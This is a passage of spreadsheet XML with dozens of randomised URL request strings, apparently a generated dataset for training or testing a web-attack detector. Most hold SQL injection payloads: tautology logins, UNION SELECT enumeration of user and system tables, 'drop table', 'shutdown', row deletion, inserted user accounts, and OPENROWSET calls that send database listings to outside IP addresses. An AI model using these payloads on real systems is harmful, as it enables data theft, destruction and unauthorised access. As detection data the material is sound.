    <t>/xx2ir/ozmmvcf_mnsqrrctfxv/exiaabwgrcarphlsxd6x/fu7vwjgye/fetebkc5ujr3ksipr/r325i/ehi/a7tniw/.sxqhba2bwinnt/ri0721rhwqutyjc/eanesd1s3vih.php?lnhtvaapguxat=4934&amp;sljhstcma=22&amp;hsepie=5i8edr0b&amp;0fpn.rcppgefn2=13811490&amp;roieanhtubinhe=;+exec(++++'ins'+'ert+++into+users+++values(0,'aosqodnjb','nvghie'++))&amp;vrafcre=ny9pej&amp;iesieaei83=ahpxfqu9fgtw</t>
  </si>
  <si>
    <t>/7i2enzo_ihome/knralvcscript6hxqpa/rtiwt3n/nqknbzhwgm7jg8uyql1q/coie4asen0a3oa7c4v.mdb?treenftvvde=1&amp;ihplhrssd8r=;++++exec++++get_cust(++++'x''+++union+select+++++object_name,object_type,''x''+++from++user_objects+++++where++++''so9''+=++''++'++++);&amp;ltpsntjohnqnil=114903&amp;iuurzscript0gk=77&amp;emed7h=3&amp;etokl0wje=73&amp;jnpdn=2458</t>
  </si>
  <si>
    <t>/ev2aqo/syhrtnchryrtoubhs/6thdtdeiutapnbn/tocnalyrcl0rdio0d/ooj0cjdz%u.shtml?r70nnlth=mafbe7mruascriptdy&amp;cvaafesso1olrh=+0ugh&amp;iylfi=gwinntc&amp;detfihoisnht=nnodeljs\\tidnee&gt;+&gt;edhw&amp;4h8ieoaple=euhhxm5u&amp;dyeiefeecs=ir9s4ew&amp;autoexecupu0e=7enelsinehkcaoh&amp;easadw9rwqces=';+insert++++into++++tm++values(666,'htd0','gxuam',0xfffff)</t>
  </si>
  <si>
    <t>/i.@lt-rq-bx9dueask/tsrx/ie.html?wlaqni9jo-='+)+++++union++all++++select++irtaoeof+++from++++iwee2f1en+++++where+++(+++''=+++'&amp;5nn=lnaaehaereive&amp;s6bncf=len&amp;oengith2y=e+e8ro&amp;utstjb05ettloxw=aysiola</t>
  </si>
  <si>
    <t>/tq/r_/veeseuatwwwo/rcp4ctrgpgs.ftdgz/ocemlotialuzthrl6.css?ide3=7llcnb1jo9ltbottae&amp;oe0thapdevsu=in+hgc~s4b8zg9re&amp;esohffnit=o+s+&amp;silfnerehdhlb=1edh&amp;hy=dyeczfa7isiollqorb&amp;tvioa8ntyhenkl=';+++shutdown--&amp;beagmgctxshe=ngme&amp;sguvi=le5froteht6i4e&amp;xcsmv=81</t>
  </si>
  <si>
    <t>/locationo/grdnteqbon/ixvcrrdvrgra-/bset1eei53/ruptu8ecyp9ufuha/syj/u.jop7n5m1onh/et56gldatesen/u1ig0.ovse-ca0m6rz-/edwjakmglfzqbivpv12b.shtml?j6vtmpwftp.psecho=2&amp;fvzovi=140&amp;unnspxoneoe=bhehprocessing-instructiontnecu\\&amp;7hocsufgunsl6=';+drop++table+++imatu</t>
  </si>
  <si>
    <t>/w-a/unede/nsgw8wr@/tvspsaseoahrnni71m.asmx?havingt1ibrpdk=ny9@k&amp;dt=\\rl&amp;sjpg5deegq=55758&amp;ls6egxumgtd=nceeor0cni&amp;npl=';+drop++table++admin&amp;tl0dicthdrsfsnl=tna0a9adeniak</t>
  </si>
  <si>
    <t>/qnydziu0w/reipn/txvedmnq-mclp1ox/uaets6albu1rtnosi8n/exg.i7hmnectrubumr/eqcxlmwp4/unzhp0nenla3/cab4q0nnnecebslsneon/r95ae45/nh8aeol/aubub.html?eteeioior=or+'aahcno'+=++'sim'+'ple'</t>
  </si>
  <si>
    <t>/efdcj/ea0ygvi/2nolc/djw7evo/sisacowh/i0k6/tnsyttik/iaubxoe6seuii/en2dtdn/9niftoocamd2dharh/rvotoxrenmm0yramz/ondddhswie.png?7bsecsdi=pa&amp;aepruh=oihzot'-5+tdrljt6&gt;&amp;iqwalsdmochav=e+ol0&amp;avf4=lqs&amp;eimeecglsiteahv=tvul&amp;cl=hx.3i&amp;wlfiaen=036970&amp;ous=01hzgh&amp;ogep9='select+++++customer_phone++'||'from+customers+++++'||'where+++customer_surname='''||+++++lv_surname||'''++++and++customer_type=1';</t>
  </si>
  <si>
    <t>/oaar_mc@ql_fb6.jpeg?talfmiw9tb=or+++590=590&amp;7wdeaanabd=2sh3v48&lt;0&amp;fnhesep=tpnirlriotwekseemh</t>
  </si>
  <si>
    <t>/tsoocreeco9angzer73/3srlmc9pidseeeeesr/r_/t1mluho/eitlgbmys/tporikmt@_9yvbzeb/nwggref69e73pqnxo@in.php3?iorn=or++4&gt;565838778854&amp;puy=318&amp;fhineuxlel=n?:</t>
  </si>
  <si>
    <t>/oa/sn4aas3tt5utar3oe/svy/ecsdsaeaptcti7za/eweemelnlgnr8hrna/ilv-ktz3ixszaky/0yha9yepvlvpfgrm/ncprsipdj/nek0yoxun8umru/5gnb0qrsngqassaa6el/uy/e6isroihassm1p.tiff?mn6l=fe&amp;wubzwpreplace5=q&amp;lstdinnt='++++)++union++++all++++select+++++1,8455,1,63,0+from+++ar+++++where+++(++++''++++=++++'&amp;fatet5ent6=txrtr&amp;owaoniiooatslt=6057914536</t>
  </si>
  <si>
    <t>/err/rsmi/lcaw8cllhomeflw/qonepassthrulibccls/oswogm1l/eeopch7rj/eckt0.php3?_rpj2iwinntubxar=abxbcrmweobke&amp;rtr0oiioaxetme=cienogeinx8&amp;eyauarznncz=or+'di0pea8rhc'++++=++++n'++++'&amp;waaowpdtaeners=scraee4&amp;rntom=rl+v6tpeuet5+uwp-rs&amp;asx0nme=htmp6qp&amp;w.w-wcfeh=d++rv+group+by=mnlocationoee;oswsa&amp;st=edtbbnxeancrh&amp;wn9stiylfsaptt=%ascriptxlink(lldocument&amp;eny7bkrm1q=2&amp;seofeuee=elanfp3s&amp;ssrt6b=704&amp;me=rrnl3fdno3ys0iide</t>
  </si>
  <si>
    <t>/nafnr0/jrnn/mnaloxm/m1ffsisafinputhtacces/dro/oeo6i/jlzqtdo-gxwbj/tt/cdsxupabs4coidaud/uc5q/zx1g.walperl.9mvvnetcat.htm?@jpdgbnqylusrb=640&amp;eerirnndd=eear+&amp;ndcohto1=chairs'+++union+++select+++++oktoonr4o++++from+dba_users+++++where+name+like++++'%&amp;hn=t6+)rt&amp;oahdhhnowipeoae=bw&amp;t5oaoieozompddd=012186&amp;r5nb=emeeiod5eh&amp;wtbbmn=42609583&amp;hl=450902&amp;l7ibineldjefbj=xcdwvb5f&amp;steogreaieyara5=n$rxdrtabld2&gt;re&amp;ctt8lheed=miwso-f_yejc&amp;6edaeiaao=3</t>
  </si>
  <si>
    <t>/rz.y/rjlfofk8dmbye1c/ffzyrpq18w.rn3gtot.i/crssearhgw/quikiboot.inizinzybdf/execprkopenhnullr2gdk/vollbyeiotsufh/rsinlnngyeejmdoe83/qds1imyp/newihninl/t5nr5oislc.shtml?ssbi='+++++union+select++++@@version,1,1,1--</t>
  </si>
  <si>
    <t>/sidivtw006stjms/l56xjvglxl0/onlihc7tc8mithuu/9bgmtoillsbetiiry/2wexy1x0ll_ef/iqv/ogg9qk6/tzhekacceptq/ttbahiebvslrztee/enr6sc52eepntttat6i/ltaslf16oelnmuatptr.asp?8srgidt=28700007&amp;eoguumyeiw7swse='select+customer_phone+++'||'from+++++customers+++++'||'where+++++customer_surname='''||+lv_surname||'''+++++and++customer_type=1';</t>
  </si>
  <si>
    <t>/oics34k6gmlepq-cna/ifi9/hf2nkeac.cfm?uhfcoxdgshtl=hwria&amp;ea=5&amp;mqbsooe5turh=')+++++union++all++select+++++'epe',463,8512,'xopototni',6++from++++tncw++++where++(++''+++='&amp;aymc8drop4.=9029768&amp;ttxa9yntitdwnh=8559111651&amp;te=irbnos&amp;j-evuko0b=heh-nemochanacceptperltrkn(+yhge&amp;lnrr2na=t&amp;7qlf2oo1f2@=wai2tnqensuusftooa&amp;rrwmr=1iyitetcoan&amp;ltdxzsihatosoe=oj3&amp;seuoidtnr=ow2sjm&amp;uqp-=ytm5y&amp;rmcutswldeaber=914654341&amp;estonge=ttfl</t>
  </si>
  <si>
    <t>/epcyfxqn4ho5m/wlibb.wdk/abq/bed/f9tnc/in.mbvn7gd@iqeljlnni/b4x/yja3orl/vg0etcbinl/ansg.jpg?tkelg='++or+++++id+in++(++select++++*+++++from++++++++user_db++)&amp;.d58xxrm.2v=9395146089</t>
  </si>
  <si>
    <t>/z0j99xh/c0reanecntvetaaao/tqj8qtdvrlkquif16/qxna8tonb/a5oadbeyp4huvnr/ms.jsp?lre=acit9nu&amp;mueeayoiotniun=t6ilntc&amp;udnqotrd=6dt&amp;+eyme[execdivrm[&amp;ek=oomsndsrv&amp;p1s=t(fes&amp;thtedhec1o5ommt=select+oioe++++from++all_users&amp;yf3xterm.3l.wget=fat$r++e&gt;iial&amp;g8ntgntyhrsr=l&amp;rgii=7348684&amp;adrcy=vbscript9eisuni&amp;deieaeosqmdeke=1520&amp;ikpyconnect0zx7=httpml+h++ehpesbgi&amp;ytrue=ec@2dzzcz&amp;srto8est3mmsd=u58e&amp;houozoaceni=13694</t>
  </si>
  <si>
    <t>/dduceninhhlll/havingxkyuswhxqlvim/0z/semxckoi5int.hsos/gt3fdrsm/muna3a-pff/anystsoselal/typwoepzexmyxcm3u@wr/r-6ujqo/nn85ef7ahgfdn.css?8a5ee=or+++++0&lt;&gt;(select++++count(*)+++++from+++++etk)&amp;osadktleli7leep=bwgetebeetltm0aea\\8p(&amp;1rieeohli=hllt34caazer7ib&amp;olkone2b8th=eatektne8t&amp;i4ia=l@j&amp;klnna3npuist=372648&amp;cswchdcolmct=mgorlemeu&lt;&amp;lyt=aheygq.i</t>
  </si>
  <si>
    <t>/aafth/6tro/nxohtaccesdsdallfyjy.sh?hyde7u='+/**/++or+++/**/''++='&amp;hi=|lut5ireplace2lor2&amp;efixocnfxq=eoyssxfe1es&amp;admintogxahaving=dr+bgsoundi&amp;rr6=rcheq</t>
  </si>
  <si>
    <t>/tigceohedplsww5/i6de/lypairyal7gzap9rxy/iarowwcqorftvviowoe/vcbcxtermu@/snr/oroeni2mtedelngtwn/n1kqw74/rwgsm1_olh.f2ommzy@e/nbv45./ectsruoemtnqvcot.tiff?hgik49atfld=10291&amp;haslietter3=estm&amp;dgiraeo93qih=ohr9togk&amp;dadcjl=:t8t&amp;6oerg59noeytte='++++or+'ns'++++between+++'r'++and++'t&amp;qnnetudf=gb5tmvz@c&amp;vcnzw4hia4echo=icowir4eqb&amp;5se1uancnr=hlgv3t_-yuns&amp;rehauealih9a=izchde]ytrtnlh7t4d|%&amp;nc7nhaoawasatc=mnvqi&amp;uii7c1royl=eqbpvtqq&amp;up=3253203&amp;etbzbbedweu=70861200&amp;masoahgii9p=2iy+&amp;erzyva-=openeoexec2</t>
  </si>
  <si>
    <t>/agcwq12cu/1rri3/tctnzpelein9aotal/atnl0stusiw/rmto7/imsliodiotoenlhtir/s6wgttee0anaiei/itlbw6z/execjjquph0tg/bflz5/ntkgynlm22u1/nrpyhosarehy@.aspx?atrtwratziqlc=539004&amp;uilnuaqtl4=sdb&amp;locationus9odocumentnvmq-9=chairs'+++++union++select+++to+++from+++++dba_users+++++where+name++++like++'%&amp;iadyt=01</t>
  </si>
  <si>
    <t>/nhx/el/_8ukcopyrkpunionbgsoundtwget/e4b5/vwyf-896j1ya-py/tlhsawatfea.gif?rii9imraug6='+or++++''='&amp;f1nmwqr=21&amp;eutyahasf=epvcw0uibray&amp;ph=20059&amp;hilr5kli8ntnm=586194516&amp;tsdo5=86&amp;etagstdhf=eeganlmiperlr&amp;fxlopenpnx6-qs=nniatnow9mhocd&amp;temvnn0oeadh=91&amp;ethksssene=4558</t>
  </si>
  <si>
    <t>/8ricmm5hn39/aqlibrlsmail9lbpz.php?lddzeq='unionallselectfieldfromoldensenwhere''++++=++'&amp;0eeuzoe=tpassthruoiee</t>
  </si>
  <si>
    <t>/idi8rj6yeaso/aohrefsqdoniif/trkve3eyshr6eiinrso/1.x3fkp8/rc.tejvny3hexcoh25/lrenloigeeeoejaxkjw.asmx?6oxnc5uii0i=l3t&amp;labwdnejdpe2n=roahr4tessog4mnsoo&amp;etf1aisml=mvtt_sn&amp;acceptm_ej2v=ts&amp;cfcopyacuxscat=wiolopentnme+6sm&amp;horriy=gtnhoiwstedllo&amp;mcyatrburd7=iaaihyraelioe&amp;fq=';++++insert+into+++++aa6sx3t++values(666,'etldct','br9x6',0xfffff)&amp;hd=asm4rtdgintn</t>
  </si>
  <si>
    <t>/mzwlnj2faslg-d/ari0wmzoz1ah-7yo/g5zaepz8c/ejgwq/sigtt/t0/kqgvpkh1on/qeafat8alusetmji/ieowu9wdtbiyop/ret.css?asolxyttda=2635265&amp;c-t3l72e0='+++++group++by+++users.id++having+619=619&amp;aiooeoee=cwe&amp;ntaaije=ro|rajpsi&amp;q1ktlihsotc=ybelim7ilot1fnshne&amp;hcdae5n0et9=efshiso</t>
  </si>
  <si>
    <t>/tniweits/prdai_7gzme8/sywgd/ioirelzifooant/rtbnnr9a/aiee/u3ems/pj1zqngcfe8hky2/5icl8bo3inetcatumetabxh/uieeoewsvaw/d.prpzcqfejri3ixnq/1sxyomgdczt_i5vii9.png?1znv=;+insert+++into+++openrowset(++++'sqloledb','uid=psem;pwd=oydtue;network=dbmssocn;address=98.199.176.215,1433;','select+*+++from+++_sysdatabases'+++);++select+*++++from+linkedorremotesrv1.master.dbo.sysdatabases&amp;ebnyoit=jdeeu</t>
  </si>
  <si>
    <t>/4uyatoett6evgt7/nl7bab8t/rtbjwdl75g/ji5iparstttskyss/kr9/bkprocessing-instructiond/i3hhna/ekggswaslshmtq3w/eap6as/nieiaisi5wfshft.tiff?dppsp5ttn=5798229&amp;onmnietmrb=av&amp;brl8q8yrm0j=yhe92a&amp;qbip=515113&amp;netreeltowti=5055&amp;.ohwhereshutdownmet=551864&amp;tacenigssy3aaet=91482&amp;yemok=neat1&amp;suw.05kjym='+++++or+++id++in++++(++select+++*++from+++user_db+)&amp;hsfesambinu=02&amp;se=80772444&amp;gtinibo=fa</t>
  </si>
  <si>
    <t>/or5jguo/eoaso0/0izyeglh6/wneanaeerae7pdndko/gqechogviu.js?eiahomeslsa_=passthruodhm9i&amp;twnhnaeyee=egpaby&amp;rsda=yi&amp;e8hz8yk9ie=lt+efntna5t&amp;zxhbo7.4=;+++++insert+++into++openrowset(+++'sqloledb','uid=lptnha;pwd=assan;network=dbmssocn;address=52.219.191.29,1433;','select+*+from+++++_sysdatabases'+++);+select++++*+++from++linkedorremotesrv1.master.dbo.sysdatabases&amp;0h1hvari1jncsam=dts0bklg&amp;irgnab=eo3tsdieigt7sgt8es&amp;f8tptnpld=92&amp;sz1ee8=2377860&amp;i1wantczsh=5&amp;d0l=ebnp&amp;ehgwf=yonr&amp;dkluncpnad=aetrdocumentv5oiinq&amp;fl=5</t>
  </si>
  <si>
    <t>/4etn@inaz/szauloyvxgib2/o.b9vjc/hjimgzcmocha-vinserttxu/ridu3/ztsihadny/jittou9omaltddhohar/86tg2yh2sbk28u/9mia/jhhslkcoantcrtp/er31l5ds/oi6kzs.css?ie7slovoll1j='+++++or++++'erev'++&lt;++'x&amp;ngo0hm-0=czhud0eifdzsopvom&amp;slxtermbla=69894&amp;getierlil=6188950&amp;eflm=msaate&amp;mmdbarin4=8836957&amp;soa=ymkseawa&amp;tnlmmeg=020&amp;rtte7=546824627&amp;o0ae=28552727&amp;idtlodwszepn=hok@zr5m&amp;ingwva25vuo.d=899888438</t>
  </si>
  <si>
    <t>/style.bdeletebe9qh/m0k/epyxe0iem6mtaenbacn/raottjfgnku9zz/mxdcj7/iwu1hd/fmhuc2@z4n/yke-llgltedp8prno.css?abdn='+and+++++user_name()='tet&amp;oetimeaiajn9ehh=tdrti&amp;kel09=rr&amp;kj2auw=tse&amp;wicoqa4=e9jf@ehfy@&amp;n8e=ozkiq&amp;lib_=or-ry+tmce|msincee</t>
  </si>
  <si>
    <t>/atge8gmncit/tmj.tiff?gduhe8xrt=nrtoo&amp;uzbtinuaeqxsebe=oaasbfc4&amp;1gxorqchg=94&amp;tgepaesur=017&amp;dkyuehevs3ejnex=udmk&amp;mjtwa=';+shutdown--&amp;uaa5deliocet=g@nhwy9&amp;ea=20&amp;im7rttug1.s=ef8sr'te2anpesunion&amp;oscriptbc=049875&amp;lae07=tn3le1oeto4xdutspo&amp;4wshlnooawheel=vgl%&lt;ousrscu&amp;dlrgs=jmister&amp;c6u=ostse0yy1lgtei&amp;hcsgsa5ln=68</t>
  </si>
  <si>
    <t>/8sdkqjjkdaz_qx/alcnu68qgsxl/8sytnier6ersotio/wair1rfme/en-tm-b67x7w1/53ob/o1snp8fmlgkfvzeql6/5egqdqkflwgq9gnja@/tu/osgtlaohetiorhag.js?thnyrsmqew8=08379&amp;0u60ll7d=il5te&amp;miwtwes4rtotc=eansr&amp;lqperlulxqrdq-=7prdt7co&amp;mgs=48&amp;en=dnerve35qi9b&amp;en8uasue=t&amp;68vppt=7579&amp;nes=dhttpletblc++ui&amp;aeast3ldbtwxt=611932&amp;nsegtfqzr=liketd%vajtmpom7t&amp;inolnt2d=;+++exec(++'ins'+'ert+++into++++users+values(0,'qp1heielw','ieoonofego'++++))&amp;d6cfetc=530263</t>
  </si>
  <si>
    <t>/s9okwzbqx2k8e8t30nd/ge/9e3masin/o0tf0oddvo8i/ileegoaahnnziepea3/stmnew3v919/lp9ppu7nzrbgn51iib/dssimarxex/a9lcel2grokrslhao/s5rlh8as5no2lntioely/fwjhqfrke.png?hx8passthruopaev3kz=vsule3n3meta4plux&amp;hssghftrvyecwie=tha7loutgtmei9&amp;p1he2heieeexe=r4elo0rpanra8+ntft&amp;chnrauhrsm=ahlicln8l&amp;n8oeonneltt8ss=ta&amp;ste0ttsemtodlx=rsl'++++union+++/**/+++select+tyuheaq3+++++from++dba_users++where++euautc+++like+++'%&amp;xp_q5yshnocatko=lwtlobalosqs2su&amp;n3ijmngbjwp=es-b4&amp;i3mciaajdtsyca=mindidocemfels&amp;vnwbc=a&amp;5ei1o=7tynhxsi28ie0pr&amp;boay=i</t>
  </si>
  <si>
    <t>/uvtbeeqeac/ue/eejear/md@cofmqkxojppr/iuq3loyl0whxyq/hcp/ckj1autoexecajig6a9b/ii0nr_9p2o2/hodna/bts/ebcchia5ri/iibuqmc5o865hh5cg.exe?2eiuaawtu=36250&amp;isoel1cn87tmiat=wh+noconnectohnalink+v)ssu5ur&amp;atahushr=s&amp;oagbsyyqz=aeepcaosnsetu81&amp;ooridc0ao=y&amp;&amp;pczdvlek=5xwvng&amp;c3wire='+or++'ellraee'+++&gt;+'s</t>
  </si>
  <si>
    <t>/6rgunode3mpv6/ej4mmp4lscqrs7oo/e6atgrrt.asp?imgqltmbodympp=auldwe8&amp;heehdnodcstan=kmm66m&amp;st4fsaemasvi2r=esqexq&amp;frb1b=or+++3996=3996</t>
  </si>
  <si>
    <t>/ehcwrkfpa/omxs/fh/racte/k2ef/onddzwf9dxhhliggaekj/pkmttld/m4zhsv8lvwg.fw-mflv-/y4nmoytmbohto/open3kdsk/cypn8yy2pyhjdever9.tiff?aesufu=chairs'+++++un/**/ion++sel/**/ect+++++betdtwz+from++++dba_users++++where+++++45svshbe+++++like++'%&amp;ssrfd=4318&amp;eh=54102&amp;etieawfa=236858&amp;cchhtpass=9690358759&amp;tbtcbt75wdk7=pwz2hdyrb&amp;dinomr8yott=hsfvard(ens&amp;x9nnlsjk0g9t=in&amp;tdddmdr=nr5&amp;r6cpujr5ci=326376&amp;asmhetow6aa=daepanm</t>
  </si>
  <si>
    <t>/ncboamexnrnfs/bno/oehlnb45o51r8f/oheuytaidiouc/gg1opt-/en7ebrd/ost/thhorl6lvrseafphnae.html?eoe0ypt7obti=')+++union+all+++select+++++jdlsest+++from+++++rerse+++where+++++(+++''++++=++'</t>
  </si>
  <si>
    <t>/8sylhtla2b9ereonfs/tunsaavyi/lg/7nelgs8sterruwer/odrnaoaz2uoepcu9w/bzafwq-chxfjbfhpk/mcb/8i/i5ip1ym/ruxxpu3f31k6xq/fuanant7aoetvs7ircah/kaqtsvpulink.js?2tt=gre&amp;97angeta='++)+++union+++++all+++++select+++++546,68,3995,1501,0812+from+++++thn9nbaa+++where+(+''+='&amp;amwf49iqyht4=rvletehr&amp;locationaqrbxabo=da</t>
  </si>
  <si>
    <t>/or/old64l0kziy5lpy/asbvt4cdnsxj6wxg.aspx?.2wsa3=0&amp;alneceoreja=origtext'or'hcio'++=++++'xhoenzpo'&amp;obumoetanesxusu=13238&amp;hssiaxrcag=073&amp;1j1plike9y=rbetweenjm&amp;oie8o3sszlesr=eim+sza\\ctrr]ewson&amp;&amp;vdctiykb3fr=s&amp;replaceo8sf24=aeetm0igodn&amp;8v@o=naoo4sioelogteoe&amp;545e8nj8o=a4f]onaobs&amp;er8=a&amp;reijw=4nxs+</t>
  </si>
  <si>
    <t>/aew3farenst/okbup/kjo/t0qy7l368gjzshvwmf/rr/grpvj.zb3q/wtq2gzwl/tsidceptddxdawy/fettejnht3dhnssnled.html?yftvp.mreplace='++++)++++union+all+select++95+from+sd2sdny+where+++(+++''+++=+'</t>
  </si>
  <si>
    <t>/oueuiedj.jpeg?ynmkbptil=wcn9i_&amp;syd3namvo=sh&amp;ffwbnibnr=g5epj&amp;suar1sxwnehsyel=acceptg&amp;oilesd=hmio&amp;nmkwu9=n$aemccao5node&amp;ielzigastqa1aeb=++++or+2+++++&gt;+1&amp;services@lg=?connectabini&amp;pedleaoaelrj=nca</t>
  </si>
  <si>
    <t>/ofntocret0or6a/hkphctst1nano/p@ol/thuksvdc/gdsndrtlt4siim5ehs.jpg?trrma='+and+++++user_name()='ptmyrk&amp;liddoyupicihk=]ialo</t>
  </si>
  <si>
    <t>/dtbbp/nof4fyopprdmbmn7/ree/fcg@zorh.dulf/voagnrnguic/somhe/j-/rnnvmfccyhg/1neegmbeisnxoettglp/aswaioetdllta/swhhtpt/nlhm6nd3n.nsf?hv8raritbdt7ai=eedsoe&amp;idn=i+&amp;both=79280596&amp;uhpe9bnhx=tkeatsd2o5ece&amp;reutpcia=rasnjrjhfsruaw&amp;rooxfluaaidw=0544932&amp;nons1hekeehkkpg=origtext'or'ehquisn'+='ntlaar'</t>
  </si>
  <si>
    <t>/elbuh23ylkyqnt.blpb/3bhf-servicesozhomeqo/is-d_btpihn/o0ylmaltrh2unfl3blo/ptgfpvwehc/hj.jsp?i4bjcebu1select=a&amp;epdenn=xz@bish._pg&amp;2xknq=sups&amp;aotllttt=7eaneeaaem+openv&amp;buye8bhkk7m=null&amp;r0dedmbnnis='++++)+union+++all+++++select+++'6wlnlypu',86,414,'oitnrqpd',72++++from+trreheet+++++where++(+''+=++'</t>
  </si>
  <si>
    <t>/1hyusak/ouhrpeveh8siye6-tjm/etf0t12elrhfayit.htm?zj8body=to&amp;tgaii5=object&amp;iashnmeid2a=8560530&amp;ht6iman=edropt/ahja&amp;eifl='++++or++id++in++++(+select++*++++from+++++user_db++++)&amp;muut1feiabfropi=m&amp;eta=ois&amp;rh4iotnnonwoo=u]e&amp;kter6ehafyaeecn=887&amp;ndtotpihmygbsce=tecoll3te&amp;aotzne=o7(a&amp;o2eckkci4inq=2025&amp;auamf=721854744&amp;adtwsitweitp6ta=ueepsneinentg</t>
  </si>
  <si>
    <t>/abmna8mliqzbst/as1n/childfapk1fnog-cyfi/eon6iuekdca.dll?beopnt0a=services(&amp;mt1afetmihiu=aainserteofseeew&amp;fdpihon11ie=47083184&amp;enadt=rriyeoezld&amp;ah=euwyun&amp;nt5a5obttwitn='+or+++id++++in+++(+++select+++*+++from+++++user_db++)&amp;my7cavnen=371</t>
  </si>
  <si>
    <t>/bn7y/y4r6goo9rion7dnt.nsf?a2akiaer=n&lt;dropi/indt+&amp;3sqb@xux=wahttp&amp;idinndta99st=nzld&amp;lbtteeb9ysd=+namanet&amp;zyc9=titefejgsin&amp;tcseo5=773993&amp;edtohseeemyrpep=qwer'++++or+++vx5maa_v.account='vpi@1ee.com&amp;tsenekasntaaede=6&amp;edat=steswinntstopny=pbam&amp;rtcb0rdiutuxdis=esi</t>
  </si>
  <si>
    <t>/hhmdrtm_rggdelutkdw/vavllkdit/vb@./t6fxh-sj5-/ze80kxy4naf/nenqwsxl6evwmn/n@hizamu.cgi?hbmo=n&amp;wn=]a&amp;8avddocument=8wqwh&amp;eiiarpcoo=4mg2oxy-dhx&amp;brcpga=97afnrd&amp;ajq9afnzi='+++)+++++union+++++all++++select+++++'vnadaae5',384,9,'0hbl',9+from++eishdeeh++++where+(+++''++='&amp;heesnirriera=n&amp;soetl=slx7p@u9-mws&amp;nbtsttewog=imgqrs</t>
  </si>
  <si>
    <t>/gnnifhla/hhk/rfmnithtee/rdebjva6_/aelr/rrpxi99scriptrn_@services7q/ihy2nygkh6h/sw/oa3hfaqseee/thoveo/kpmet/lelhothixmom1e.css?arofcgontao=++oz]cpslboot.inisfrfnmn6m/+&amp;tdghcaiqttea=2244&amp;fefdpircp=2660976&amp;hrxa7stueo=yio?+at'i]b&lt;s+94et&amp;oeev=t8=al+&amp;htitl=e&amp;csa4eed=ba2b&amp;ou8cgmsatcngom=stiktsts&amp;sauehzdoniu0ape=oitroh1hfc2o&amp;nosaeypqig=3rurmoeseeo6f&amp;ardth7jk=;+select+++*++from+++openrowset(+'sqloledb','uid=vhnalee1;pwd=ab;network=dbmssocn;address=35.88.38.149,42592;','select+++*+++from+++++ssoteadosr'+)&amp;hgbwsrpdch=wby&amp;9qnodehbawkq=ecm6933pf&amp;ou=trtone8edr20wlnl&amp;eesrn=36</t>
  </si>
  <si>
    <t>/le5aw/hurataeh7/bpasswdn/bnhjq1cuhk3l/era3tixhanhreah/06p-fi..mdb?cpassthruqtph=jofoxoa4mariso&amp;iih=scn7fseonu&amp;7waditwtiodi=zqdhz91g6vh&amp;ilo9i=adxp6ritans&amp;u4peebt4wdiemhs=trthtpassefx&amp;trita3lao7r='+++++union++++++++++all++++++++++select+++sognzt+from+zomednraie+++++where++''++++=+++'</t>
  </si>
  <si>
    <t>/mimtsplb1t.-ttw.t8yc/i4ja7nnw4nthjrmolest/tf5d/eeqtqa/iseu37b/r6p.msf?otaerao0nw=fst4&amp;ld0oesser=ihiit9rotaeneunrh&amp;oks4zbtelnetid=ahuien7ic7&amp;e35ndhsipe1h=134&amp;ezeu=mtekt'++);+delete+from+++users+++++where++upper(username)++=++upper(++'admin&amp;oeludgspoimalox=eailnhodetiis&amp;yrpemhetaif2e=mgxq.b8tg4&amp;hhul=721537&amp;rbthmiitfob2c=8347&amp;atalxxes=eqtvbqt&amp;eoynif=wcnnlgzlt&amp;cnvdya=aedxv&gt;io</t>
  </si>
  <si>
    <t>/iw2ehnlstanaooahp/wtpj6ha2tyd/nus.nsf?wherercppynko='+++++/**/+++or+/**/+'cphxelwo'+++++&gt;++++'s&amp;htims=9798420&amp;oapshcr=tke&amp;anlirezfaea=504779&amp;uexniroii=m+e/&amp;ptea8=540462</t>
  </si>
  <si>
    <t>/yjq220cdd0gwqhq2rv./hoeeras/8nullt1oce_metaq7/ib5ozfogd5bg/qbpdf-_38gpmj26nqck/trr3cf9oraufkx/7scriptuxax@wzrk/et4caeesodq/mrklqhp-3xgb9/r3sdnn9c5s4lus3h/ohe3empc.png?eh=eaoloiinmehetcr&amp;syeaae2is2=33180&amp;pj9mecatxqx3=ialo192iatec8&amp;at='++)++++union+all+select+8++++from++++tfm55eeomi+where+++++(+''=+++'&amp;aepemxr7b=reue9td+e7mnuig&amp;4a7ay=969&amp;yudsdiic=1&gt;pmihoi+</t>
  </si>
  <si>
    <t>/h6-a0il2fu/o2iqo1ur/nernob2tse6o1en/vm1stnvoijdfe/tii7eo5nfol/k0ay-/okh1r/4s5bmcestrjkc/rliyawe/cellhwzop-zstu/i8eyt.asp?deenheaiaeynse=mlatcio+8hh=tf[&amp;air1ryythhao7e=0aite&amp;myeasoyeyoieef=rhahmnao0vxcs&amp;5bos=o6xwoeotysfi&amp;egeah=of@gs&amp;tte08='tmpss&amp;eiintonhhz2eoat=t&amp;eaaho='+++++(++select++++top+1++3hiyjo+++++from++++m4haenr)+++++++++'&amp;jh68mocha@qp=576952&amp;eoo5gtin6tti3j=bgsoundiimge|&amp;balt=&amp;nmumas27%s&amp;srkcselt4imt6=ecv-m9j&amp;tpmeg6u1bysytyi=ibenph-tee</t>
  </si>
  <si>
    <t>/o.ag27pu4kpwcjo/amtk/fnww9trwel0avjgqu-y.msf?5reemcnwtiudnly=gr]t&amp;utdx8dutuiody=35&amp;hwp-ygroupbywzitmppo=lkyhb&amp;mylghttpacathlncrf=+\\asglib&amp;omtr0trj0sou=likeert&amp;4yhe=or++'lrw64dl'++like+'sim%'&amp;eeny=zn++ui'a[oet&amp;yytma=mnm</t>
  </si>
  <si>
    <t>/ij.hkct3ezrrfe/nmedvw/v.rffgfo7eb-mnityjv/fm68u_/gandjs@kiikqu5/ardgcfznb/eeoea/nutahw/snnaxuc/1hchs4y78mb45ge-7@w/fvdqxzir.mdb?uauxt=bhavingdgo&amp;ougpooiotsrg=e61pb&amp;soaonatsuhaghi=58203&amp;non6o=oe&amp;icsoma=teule9-i&amp;lfd0-7h1aq=+&amp;jledmrmrohc3=ghp&amp;enjuellrrealshw=ipc7j&amp;irsfcdpi=opt&amp;cei='select+customer_phone+++'||'from++++customers+'||'where+++++customer_surname='''||+++++lv_surname||'''++and++++customer_type=1';&amp;plnaotltp=7713&amp;eiahuethe=51l4z</t>
  </si>
  <si>
